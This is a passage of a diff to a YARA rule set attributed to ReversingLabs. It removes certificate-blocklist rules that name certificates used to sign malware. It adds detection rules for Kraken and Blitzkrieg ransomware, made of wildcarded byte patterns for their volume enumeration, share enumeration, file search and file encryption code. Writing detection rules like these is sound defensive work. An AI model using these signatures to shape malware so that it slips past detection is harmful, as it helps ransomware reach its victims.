+		description = "Yara rule that detects Kraken ransomware."
 		author = "ReversingLabs"
-		id = "919a62ba-2902-5088-ad92-9f1bae23e68f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "7c302c2e-6ffc-5f51-90f4-c4ebd6c1c28b"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L315-L331"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Kraken.yara#L1-L151"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0f8fda07dc362b7e04892446f1abe1e5f5717ee715824a2c1f6550096c366701"
+		logic_hash = "4a3867aba4dbdce5d008331a3058f57b00db246975fc4d77b79ab49d5f0bbb15"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Kraken"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dmitry Vasilev" and pe.signatures [ i ] . serial == "0c:0f" and 1386719999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_06A164Ec5978497741Ee6Cec9966871B : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "6c73206d-3d5c-5540-a2e1-d00138d7e1b5"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L333-L349"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8a27015d94a3bd8543a8ca9202831ffc9c9e65f61bf26ed6825c3e746b6af0d4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$enum_volumes = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 04 ?? 00 A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 50 45 4C 00 C7 45
+            FC 00 00 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
+            8A 06 84 C0 0F 84 ?? ?? ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8B D4
+            C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 83 7A ?? ?? 72 ?? 8B 02 EB ?? 8B C2 C6 00
+            ?? 80 3E ?? 75 ?? 33 C9 EB ?? 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 51 56 8B CA
+            E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 C6 ?? E9 ?? ?? ?? ?? BA ??
+            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ??
+            ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? 68 ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8
+            ?? ?? ?? ?? 8B E5 5D C3 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? B8 ?? ?? ?? ?? C3
+        }
+		$enum_shares_p1 = {
+            50 56 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
+            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 66 0F 1F 44 00 ?? FF 75 ?? 6A ?? FF
+            15 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 56 8D 45 ?? 89 75 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 33 FF 0F 1F 40 ?? 3B 7D ?? 0F 83 ?? ?? ?? ?? 8B C7 C1 E0 ??
+            03 F0 F7 46 ?? ?? ?? ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 06 83 C4 ?? 8B C8 0F 11
+            00 0F 10 46 ?? 0F 11 40 ?? E8 ?? ?? ?? ?? 8B 75 ?? B3 ?? 47 EB ?? F7 46 ?? ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 8B 56 ?? 85 D2 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C6 45 ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 71 ?? 8A 01 41 84 C0 75
+            ?? 2B CE 51 52 8D 4D ?? E8 ?? ?? ?? ?? 51 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B
+            C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B
+        }
+		$enum_shares_p2 = {
+            4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8
+            ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 55 ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 55 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ??
+            C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6
+            C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ??
+            E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
+            ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ??
+            8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ??
+            E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B
+            C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
+            8B 75 ?? B3 ?? 47 E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 E9 ?? ??
+            ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ??
+            ?? ?? ?? C3
+        }
+		$find_files = {
+              55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ??
+              ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D 4D ??
+              C6 45 ?? ?? 8B 75 ?? 83 FE ?? 8B 7D ?? 8B 55 ?? 0F 43 CF 6A ?? 68 ?? ?? ?? ?? E8 ??
+              ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43 CF 68 ?? ??
+              ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43
+              CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ??
+              6A ?? 0F 43 CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57
+              C0 C7 45 ?? ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+              45 ?? ?? ?? ?? ?? 83 FE ?? C6 45 ?? ?? 8D 4D ?? 0F 43 CF E8 ?? ?? ?? ?? 8B F0 89 75
+              ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B D6 50 8B CE E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ??
+              85 DB 0F 84 ?? ?? ?? ?? 8D 7B ?? B9 ?? ?? ?? ?? 8B C7 66 0F 1F 44 00 ?? 8A 10 3A 11
+              75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 F6 EB ??
+              1B F6 83 CE ?? B9 ?? ?? ?? ?? 8B C7 0F 1F 40 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50
+              ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 3B F0 8B
+              75 ?? 0F 85 ?? ?? ?? ?? 8B 43 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 57 3D ?? ?? ?? ??
+              75 ?? E8 ?? ?? ?? ?? 50 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC
+              ?? C6 45 ?? ?? 8B CC 8B D0 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D
+              ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+              83 EC ?? C6 45 ?? ?? 8B CC 8D 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4
+              ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
+              83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ??
+              ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+              C4 ?? B8 ?? ?? ?? ?? C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ??
+              ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD
+              E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+              55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ??
+              ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 C6 45 ??
+              ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7
+              41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 45 ?? 6A ??
+              50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41
+              ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00
+              ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D
+              4D ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 7D ?? 0F 43 05 ?? ?? ?? ?? 83 FF ?? FF
+              35 ?? ?? ?? ?? 8B 75 ?? 0F 43 CE 8B 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
+              ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85
+              C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+              83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8
+              ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8
+        }
+		$encrypt_files_p2 = {
+              84 C0 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ??
+              ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45
+              ?? 6A ?? 0F 43 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B
+              D8 83 FB ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 68 ??
+              ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 1B D7 01 05
+              ?? ?? ?? ?? 11 15 ?? ?? ?? ?? 83 65 ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 8B FA
+              8B F0 8B 55 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 6A ?? 1B D7 01 05 ?? ?? ?? ??
+              8B 45 ?? 11 15 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 6A ?? 83 15 ?? ?? ?? ?? ?? 6A ?? 53 FF
+              15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 FF 75 ?? FF 35 ?? ??
+              ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 53 1B D7 01 05 ?? ?? ?? ?? 11 15
+              ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 51 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 83
+              79 ?? ?? 72 ?? 8B 09 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D
+              ?? E8 ?? ?? ?? ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ??
+              ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
+              64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JOHN WILLIAM RICHARD" and pe.signatures [ i ] . serial == "06:a1:64:ec:59:78:49:77:41:ee:6c:ec:99:66:87:1b" and 1385596799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_volumes and $find_files and ( all of ( $enum_shares_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1121Ed568764E75Be35574448Feadefcd3Bc : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Blitzkrieg : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Blitzkrieg ransomware."
 		author = "ReversingLabs"
-		id = "44fa007f-f5f7-5001-8b92-eb4a657ea756"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "078f7f9d-edd4-52b4-a30e-e968542da95c"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L351-L367"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Blitzkrieg.yara#L1-L127"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3316a2536920c5aa9dd627cec7678e6fe33c722b4830dd740009c20dd013c9ab"
+		logic_hash = "22dd16c886a1982186fe927e633be9951da7d7e664e877e11fa976696b2bc86f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Blitzkrieg"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FRINORTE COMERCIO DE PECAS E SERVICOS LTDA - ME" and pe.signatures [ i ] . serial == "11:21:ed:56:87:64:e7:5b:e3:55:74:44:8f:ea:de:fc:d3:bc" and 1385337599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6Ed2450Ceac0F72E73Fda1727E66E654 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "c19ddbde-eec0-5ebb-8f11-1e7dcb489bc8"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L369-L385"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0e5af7795c825367d441c8abc2aa835fa83083eb8ee1f723c7d2dacff1ca88ff"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 8B 45 ?? 8B 40 ?? 8B 10 FF 52 ?? 8B F0 4E 83 FE ?? 0F 8C ?? ??
+            ?? ?? 8B 45 ?? 8B 48 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 A0 ?? ?? ?? ?? 88
+            43 ?? C6 43 ?? ?? 8D 4D ?? 8B 45 ?? 8B 40 ?? 8B D6 8B 38 FF 57 ?? 8B 55 ?? 8B C3 E8
+            ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3
+            8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4B ?? 89 0C
+            82 4E 83 FE ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 84 C0 74 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$search_files_p1 = {
+            E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? B2 ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? F6 40 ?? ?? 74 ?? FF 45 ?? 8B 45 ?? F6 40
+            ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ??
+            74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 52 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
+            E8 ?? ?? ?? ?? 85 C0 7E ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 8B 52 ??
+            48 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 40 80 7C 02 ?? ?? 74 ?? 8D 85 ?? ?? ??
+            ?? 8B 55 ?? 8B 4D ?? 8B 49 ?? 4A 85 C9 74 ?? 3B 51 ?? 72 ?? E8 ?? ?? ?? ?? 42 8A 54
+            11 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 55 ?? 8B 45
+            ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 45 ?? FF 4D ?? 75 ?? 8B 45 ?? 8B 10 FF
+            52 ?? 48 85 C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            8B 55 ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 55 ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 85 C0 7F ?? 8B 45 ?? 8B 40 ?? 50 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B D8 B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
+        }
+		$search_files_p2 = {
+            E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 8B 4B
+            ?? 89 0C 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8B
+            45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0
+            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ??
+            EB ?? FF 45 ?? FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ??
